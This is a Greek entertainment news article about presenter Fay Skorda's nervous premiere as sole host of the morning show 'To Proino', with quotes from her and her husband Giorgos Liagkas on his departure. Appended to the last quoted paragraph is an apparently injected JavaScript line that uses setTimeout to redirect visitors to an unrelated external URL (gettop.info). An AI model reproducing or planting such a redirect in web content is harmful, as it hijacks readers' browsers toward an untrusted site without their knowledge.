Αγχωμένη στην πρεμιέρα η Φαίη Σκορδά (BINTEO)

0
25

 

Πρεμιέρα έκανε το Πρωινό με κεντρική παρουσιάστρια πλέον τη Φαίη Σκορδά η οποία εμφανίστηκε χαμογελαστή αν και αρκετά αγχωμένη όπως παραδέχτηκε η ίδια.

«Κάθε πρεμιέρα έχει άγχος. Είναι όπως γυρνάμε στη δουλειά μας έπειτα από διακοπές» είπε η παρουσιάστρια που παρουσιάζοντας παλιούς και νέους συνεργάτες, απευθύνθηκε στον Θέμη Γεωργαντά.

«Σιγά σιγά την πλησιάζεις τη θέση» του είπε γελώντας σημειώνοντας ότι ο σύζυγός της Γιώργος Λιάγκας δεν θα είναι πλέον μαζί της.

«Θέλω τη στήριξή σας. Πάντα με στηρίζατε αλλά φέτος λίγο περισσότρο. Είμαι 14 χρόνια, το Πρωινό είναι τα τελευταία έξι χρόνια και είχα συνηθίσει να κατεβαίνω τη σκάλα με παρέα και φέτος… μόνη μου… Η παρέα μας θα είναι λίγο πιο γυναικεία φέτος γι’ αυτό θέλω λίγο περισσότερο τη στήριξή σας!» ζήτησε η Φαίη Σκορδά.

Όσο για την απουσία του Γιώργου Λιάγκα ο ίδιος είπε: «Το έλεγα χρόνια ότι για μένα αυτός ο κύκλος θα έπρεπε να είχε κλείσει. Κάποια στιγμή συμβαίνουν αυτά τα πράγματα. Θεωρώ ότι πρέπει να ανανεωνόμαστε. Φέτος είναι μια μεταβατική χρονιά με το Rising Star και το Lucky Room. Μια χαρά θα είναι το πρωινό χωρίς τον Γιώργο. Το ότι δεν θα λέω την άποψή μου στο Πρωινό αλλά κάπου αλλού, δε σημαίνει ότι θα λείψει αυτό από τον κόσμο. Θα με ακούει στο ραδιόφωνο. Το υπόλοιπο κομμάτι είναι καθαρά γυναικείο και το κάνει εξαιρετικά η Φαίη Σκορδά. Κάνει πολύ καλές συνεντεύξεις, μπορεί να ηγείται μια ομάδας, δε νομίζω ότι θα υπάρξει κάποιο έλλειμμα. Έξι χρόνια ήταν πρώτο σε νούμερα το πρωινό, δεν έχω να αποδείξω κάτι σε κανέναν. Πρέπει να πεις μόνος σου «τώρα θα κάνω ένα βήμα πίσω» για να ξεκουραστείς κι εσύ και να ξεκουράσεις και τον κόσμο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here